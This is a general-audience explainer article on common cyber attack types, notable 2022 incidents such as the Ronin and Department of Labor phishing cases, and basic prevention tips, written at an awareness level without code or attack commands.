Cyber attacks have come a long way from duping us into helping a Nigerian prince down on his luck. Now, cyber attacks have grown into a global, $43 billion business, on a trajectory of growing by at least 15 percent each consecutive year.
On average, the Federal Bureau of Investigation receives 2,300 complaints per day reporting cyber criminal activity. These victims have paid out $6.9 billion by way of successful schemes in 2021 alone.
Given a 65 percent increase in identified global losses to cybercrime over the past year, taking preventative measures and self-educating on the latest trends are a user’s best bet in avoiding malicious online traps.
Common Types of Cyber Attacks
- Cross-site scripting (XSS)
- Denial of service (DOS or DDoS)
- DNS tunneling
- Drive-by download
- Man in the middle
- Password cracking
- SQL injection
- Zero-day exploits
What Is a Cyber Attack?
Any attempt to gain unauthorized access to one or more computers with intent to cause harm qualifies as a cyber attack.
These expensive, unwelcome attempts steal, expose, alter, disable and destroy information through data breaches. By 2025, researchers at Cybersecurity Ventures predict $10.5 trillion in damages per year, worldwide.
And — with nearly 300,000 bits of malware created daily — it’s not stopping anytime soon.
But before we get into the top cyber attacks of 2022, it’s important to understand the many forms cybercrime can take.
17 Common Types of Cyber Attacks
So, how common is ‘“common?”
Cyber attacks occur every 39 seconds, accumulating 30,000 hacks per day, worldwide.
The following list outlines cybercrimes worth keeping on your radar, leading with the most frequent attack types — malware and phishing.
Hackers designed malware — or malicious software — to intercept data from a computer, network or server by tricking the users themselves into installing faulty programs to their devices at their own hand. Once compromised, a malicious script bypasses security protocols, allowing hackers access to sensitive data or even to hijack the system entirely.
Malware is one of the most commonly used cyber attacks, with 560,000 incidents detected every day, and it does not discriminate — attacks have been wagered against companies, governments and individuals, frequently partnered with phishing emails.
Cloud-based, IT security company Mimecast compiled feedback from 1,400 information technology and cybersecurity leaders — screening more than one billion emails per day — in their latest State of Email Security report. They found that 8 out of 10 organizations experienced malware activity internally, as it spread from one infected employee to another. That number, 83 percent, accounts for a 10 percent increase from 2021 — making it the highest rate of infection since records began in 2016.
The average cost of a data breach reached a record high of $4.35 million in 2022, according to a report from IBM and the Ponemon Institute, with remote workforces playing a part in the $137,000 increase from the previous year.
Different Types of Malware
- Ransomware: a form of cryptoviral extortion that encrypts files on a system. Hackers lock the original owner out of their files, threatening to destroy or publish confidential information, until a ransom is paid. There is a ransomware attack every 11 seconds, at a global cost of $20 billion annually.
- Spyware: voyeuristic software that records a user’s activities and reports data back to the hacker. This subgenre of malware spans adware, system monitors, web tracking and trojans that all share the goal to install, breach the network, avoid detection and safely remove themselves from the network once the job is completed.
- Keyloggers: malware that captures a user’s activity by recording their keystrokes. The tracked data is most often used for blackmail or identity theft purposes.
- Trojans: a covert malware that hides inside a seemingly legitimate piece of software. The most widespread malware — Emotet — uses advanced, self-propagating and modular trojans concealed within spam emails.
- Viruses: activated by a click, these bits of software self-replicate unbeknownst to the user, slowing down a device and potentially destroying data in the process. A transient version, known as worms, move throughout infected network nodes while granting hackers remote access to the entire system.
Like fish to dangling bait, hackers cast lines of digitized fraud out to unsuspecting users in hopes of a big catch — sensitive information or access to a network, so as to engage malware measures. These cybercrimes deliver malware straight to your inbox in well-known email schemes that use faulty links or attachments. They can be fueled by social engineering — a malicious data-collection tactic that uses psychological manipulation — and tailor-made for recipients to be tricked or spoofed into a message’s legitimacy by impersonating a mutual party.
Of all cybercrimes, email phishing is responsible for 91 percent of malicious attacks. In its many forms, phishing claimed 323,972 victims in 2021, per the latest FBI Internet Crime report.
No one is safe — a phishing campaign using Office 365 stole credentials from the U.S. Department of Labor in January while PayPal impersonators continue to regularly scam millions from online consumers.
Types of Phishing Schemes
- Spear phishing: Typically through email, hackers use personal information sourced from an individual’s digital footprint — data from a person’s online activity, often lifted from social media or bought off of the Dark Web — in order to convince a specific individual to click on a fraudulent link.
- Vishing: Also known as voice phishing, this is a category reserved for hacking scams via voice calls. One in three Americans have fallen victim to fraud via phone — popularized by “scam likely” calls in recent years — racking up a total of $9.8 billion in 2021, according to an insights report conducted by TrueCaller, a smartphone call-verification company.
- Smishing: A portmanteau of SMS and phishing, this type of cyber attack exploits mobile devices and is spread via text messaging.
- Whaling: Curated attacks that try to reel in the biggest fish — high-profile individuals like CEOs and executives — to steal their credentials and gain backdoor access to a company’s network. Although rare, these phishing attacks can reap the highest reward when successful.
- Angler phishing: a new type of phishing scam reserved for social media platforms. Found in comment sections or by way of direct messaging, fraudsters rely on the trust built by popular businesses in their disguises as customer service agents to siphon information from customer complaints.
Hackers promoted a Bitcoin scam across 45 of the 130 high-profile Twitter accounts they gained access in a spear phishing attack on Twitter employees in July 2020. Each profile, from Barack Obama to Elon Musk, Bill Gates, Jeff Bezos, Apple and Uber, had more than one million followers each. Valued at the time, at least $180,000 in Bitcoin was transferred to scam accounts.
Cross-Site Scripting (XSS)
By injecting malicious, client-facing scripts into the code of a trusted web application or website, cross-site scripting, known as XSS, offers hackers unauthorized access to user information, commonly collected from an on-site search or contact form.
Sites vulnerable to XSS include message boards, forums and web pages, which depend on user input that is not screened for malicious activity; however, this does not exclude bigger sites.
Data breaches affected nearly 380,000 booking transactions at British Airways in 2018.
Cryptojacking refers to a hacker’s covert efforts to commandeer a computer’s processing power for the purpose of mining cryptocurrencies, like Bitcoin and Ether, while the user is unaware or non-consenting. Jeopardized systems suffer a slow processing speed.
Denial of Service (DOS)
Denial of service, or DOS, approaches cyber attacks with one singular tactic: totally overwhelm. Typically, this is done by flooding servers with traffic generated by superfluous, false requests in order to overload a system, subduing some or all legitimate requests.
The endgame for DOS hackers isn’t to steal data, but rather to shut down business operations, as demonstrated in February of 2020 when a hacker came for Amazon Web Services in the largest, publicly disclosed data breach to date that measured 2.3 terabytes per second. In this instance, the hacker opted for a DDoS attack, or distributed denial of service, which allows multiple devices to be breached simultaneously.
DNS spoofing happens when hackers send online traffic to a “spoofed” or falsified website that replicates a user’s desired destination, like a login page for a bank or social media account. That information, of course, is submitted to hackers sitting at the other end of the fabricated site linked to a fraudulent IP address.
These incidents can be used to sabotage companies by redirecting visitors to a low-grade site with obscene content or to simply pull pranks. In 2015, a group of hackers identified only as “Lizard Squad” detoured Malaysia Airlines website traffic. The new homepage showed an image of a plane with the text “404 – Plane Not Found” imposed over it, in reference to controversy around Flight 370, which went missing the year prior. No data was stolen or compromised during the attack but custody of the site was frozen for several hours.
Even the most widely trusted protocols, like the domain name system, can be subverted by hackers. DNS acts as a phonebook for the internet, helping to translate between IP addresses and domain names. Through tunneling, also referred to as hijacking or poisoning, malicious domains or servers sneak traffic past a network’s firewall to perform data exfiltration.
DNS tunneling attacks are especially hazardous as they often go undetected for an extended period of time during which cybercriminals can steal sensitive data, change code and install new access points or malware.
Nearly three-quarters of organizations suffered a DNS attack in 2021, according to a study of 302 security professionals by the Neustar International Security Council, a group of cybersecurity leaders across key industries and companies.
Most cyber attacks require interaction from a user — like clicking on a link or downloading an attachment. Drive-by downloads do not. They can infect unsuspecting users while browsing corrupted websites or engaging with deceptive pop-up windows.
As the title suggests, insider threats are cybersecurity risks that originate from within an organization. These are committed by an agitated party — oftentimes a current or former employee, contractor or vendor — who misuses legitimate credentials to leak, steal or distribute internal information.
For example, at the start of the COVID-19 pandemic, a disgruntled former staff member of a medical device packaging company used his administrator access to alter over 100,000 company records.
The average cost of insider threats rose from $11.45 million in 2019 to $15.30 million in 2021.
Internet of Things Attack (IoT Attack)
This type of cyber attack takes on the nature of a DoS or DDoS attack that hijacks domestic, internet-connected devices such as smart speakers, TVs or tech toys to assist in data theft. Gadgets that fit within the Internet of Things usually don’t have antivirus software installed, making them easy targets for hackers.
In some instances, hackers turn entire armies of devices — dubbed botnets — against their users. Alexa, Ring doorbells and even smart fridges can be loaded with malware in one fell swoop, indicated by sluggish, zombie-like defects in performance.
Man in the Middle (MITM)
When an uninvited third party puppeteers communication between two private parties — say, by using a public WiFi network — this is known as a man-in-the-middle attack.
In this example, messages between two parties are intercepted and manipulated to fit a hacker’s motive, who is pretending to play each respective role. Meanwhile, the mutual parties are unaware that their conversation is being tampered with.
A Look at a Similar Attack: Man on the Side
A man-on-the-side attack enables rogue intruders to read and inject arbitrary messages into a communications channel, without modifying or deleting messages sent by other parties. This tactic relies on strategic timing so that replies containing the malicious data are sent in response to a victim’s request before an actual response from the server.
Investigators at Check Point Research uncovered the “ultimate” MITM heist in 2019, when hackers diverted $1 million in venture capital funding intended for an Israeli startup to an attacker-controlled bank account in an elaborate wire transfer email scam.
Perhaps the most direct of attempts, password cracking is the process of recovering passwords through various techniques.
Types of Password Cracking Attacks
- Brute-force: A common, trial-and-error approach that includes repeatedly inputting different passphrases, checked against a cryptographic hash, until the correct character combination lands.
- Password spraying: Often automated, hackers will circulate through a list of common passphrases — such as “123456,” “qwerty” or “password” — across victimized accounts.
- Social engineering: As seen in phishing attacks, hackers may try to manipulate a user by impersonating a trusted entity, like a friend or a bank.
Often featured as a collection of tools, rootkits are a type of malware that deeply embed in an operating system upon installation. This can only be achieved after unauthorized access is gained, through means of password cracking or phishing.
Rootkits allow total administrative control over a device or system. This makes them difficult to detect as all evidence of their intrusion can be covered up, while the hacker now holds privileged access. All antivirus efforts may be subverted by the overriding malware, making rootkits nearly impossible to expunge.
Also known as cookie-hijacking or cookie side-jacking, session hijacking is a type of MITM attack that occurs when a hacker takes over a session between a client and the server while they are logged in. This is done by swapping out the attacker’s IP address for that of the client’s address, which will continue to access the server without requiring authentication.
Structured query language refers to a domain-specific standard that supports most websites. Attackers use SQL injection techniques to gain unauthorized access to a web application’s database by adding strings of malicious code in an effort to trick the database.
The intention here is to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, transfer administrative authority of the database server and expose, destroy or disqualify data.
URL manipulation, or rewriting, refers to the process of altering the parameters of a URL to redirect a victim to a phishing site or download malware. This tactic can piggyback off of current content management trends.
For example, many administrators trim URLs for user convenience. Hackers can easily “poison” a shortened URL, copying its likeness and redirecting users to a phishing trap. Cyber criminals can also guess common URL formats — by adding “/admin” or “/.bak” to the end of a site — to hack into the backend of a server.
Zero-day exploits occur when bad actors find vulnerabilities in freshly launched software or networks and exploit the bugs before the unaware manufacturer can patch them. Primarily, the goal is to steal data or cause damage.
Microsoft, Google and Apple all had to patch zero-day bugs in the first few months of 2022.
Researchers discovered one of the most dangerous zero-day vulnerabilities late last year in Log4J — a Java-based utility that is ubiquitous across consumer and enterprise systems from Apple’s iCloud to Amazon, leaving much of the internet at risk.
Major Cyber Attacks in 2022
Individuals, governments and companies — it can happen to anyone. Here are the top five cyber attacks of this year.
Google and Facebook Scammed Out of $100 Million
In possibly the biggest social engineering attack to date, scammers sent phishing emails to Google and Facebook employees that extorted $100 million from the tech giants over a two-year period. Messages that included invoices for goods and services — which were genuinely provided by the manufacturer — filed payment via direct deposit into a fraudulent account.
In 2019, a Lithuanian national, Evaldas Rimasauskas, pleaded guilty to the wire fraud theft, where he set up fake accounts that impersonated manufacturers under Google and Facebook and bank accounts in the company’s name.
U.S. Department of Labor Imitated in an Email Phishing Attack
A sophisticated phishing attack designed to steal Office 365 credentials impersonating the U.S. Department of Labor has made headlines as a landmark for how convincing phishing attempts have become.
The January attack used two methods to impersonate the Department of Labor’s email address — spoofing the actual email domain (“[email protected][.]gov”) and buying look-alike domains (“dol-gov[.]com” and “dol-gov[.]us”) — which went undetected by security gateways.
Additionally, emails were professionally written and stamped with official government branding, inviting recipients to bid on a government project, which contained malicious links and attachments.
Digital Warfare: Russian vs. Ukraine
Ukrainian government agencies and non-governmental organizations have dealt with Russian cyber tactics for years, like blackouts, election interference, data breaches and destructive malware on servers across the country.
Then, as the controversy of war began to manifest in February, Microsoft warned of a new spear phishing campaign by a Russian hacking group, Gamaredon. According to Microsoft’s findings, the group had allegedly been targeting “organizations critical to emergency response and ensuring the security of Ukrainian territory” since 2021.
Ukraine has since formed a volunteer “IT Army,” fixed to mounting DDoS attacks, while hacktivists from around the world have taken digital arms to aid Ukraine in the conflict. As a result, Russia has suffered data breaches and service disruptions at “an unprecedented scale,” reports Matt Burgess for The Wired.
Data Theft From Healthcare Providers
Two million Americans may have been compromised from a data breach — including names, social security numbers, birth dates, addresses, billing information and medical information — in June after attackers targeted a Massachusetts service provider, Shields Health Care Group, throughout March.
Moving south, Baptist Health System and Resolute Health Hospital in Texas announced a similar breach three months later. Both Kaiser Permanente and Yuma Regional Medical Center in Arizona also disclosed data breaches in June, affecting a combined 770,000 patients.
DeFi Platform Hacks
Rapid expansion of the cryptocurrency ecosystem has come with steep losses.
At the end of March, North Korean hackers known as the Lazarus Group used hacked private keys to steal decentralized finance (or DeFi) assets, valued at $625 million at the time, of Ethereum and USDC stablecoin from the popular blockchain Ronin.
This came after another group exploited vulnerabilities in the bridge of another platform, Wormhole, for $320 million worth of its Ethereum variant. Later, attackers targeted the stablecoin protocol Beanstalk, granting themselves a “flash loan” to steal about $182 million in cryptocurrency in April.
According to the REKT Database, the world’s first database of DeFi scams, hacks and exploits, DeFi protocols have lost $4.75 billion in total due to scams, hacks and exploits since inception, with only $1 billion successfully recovered.
How to Prevent Cyber Attacks
Because you can never be too safe, here are some best practices to consider when taking preventative action against cyber criminals:
- Install antivirus software with malware protection. Even if you accidentally click on a malicious link or download a viral attachment, hackers won’t be able to touch your data with the right programs in place.
- Double down with a firewall. They act as the first defense between a computer and the internet.
- Consistently back up your data. In a worst case scenario, having a backup can help avoid downtime, data destruction and even financial loss.
- Use complex passwords and enable multi-factor authentication. Keep them complex and at least eight characters long. Combine letters, numbers, symbols and cases. Enabling multi-factor authentication adds that extra layer of protection.
- Clue in on phishing attacks. Unsolicited emails, texts, direct messages, attachments and calls are always suspect. Generic email domains — addresses ending in @gmail.com or @yahoo.com — are a cybercriminal’s go-to move, along with fabricated logos, poor grammar and spelling errors. More often than not, scare tactics, like urgent and threatening tones, are used to provoke a victim into action. Remember: Legitimate companies will never ask for sensitive information via email.
- Keep up with trends. It’s inevitable that phishing tactics will only become more convincing over time. Being aware of mass scams, like PayPal and Internal Revenue Service imitators, may help curb rash reactions to instigative notifications.
- Blue mark or bust. When corresponding with an official support page or account for a company, they should be verified and directly linked to their main page. Cross-checking smaller businesses too young for official verification for history consisting of customer interactions is a great way to self verify. Avoid accounts with only a few followers and no posts.
- Surf securely. When web browsing, look for a locked padlock icon next to the URL in a browser’s search bar to ensure it’s secure. This indicates that the website has a valid SSL certificate and HTTPS protocol.
- Software updates are your friend. Keeping up to date on your devices boosts security as hackers plot their attacks on vulnerabilities found in outdated software.
- Connect to a VPN when using public Wi-Fi. Whenever using a public Wi-Fi source — even checking your email — a VPN can be used as a best practice for data protection.
- Avoid oversharing on social media. Everything shared online becomes part of a user’s digital footprint, which hackers will use to infer passwords and security questions clues, or launch social engineering attacks.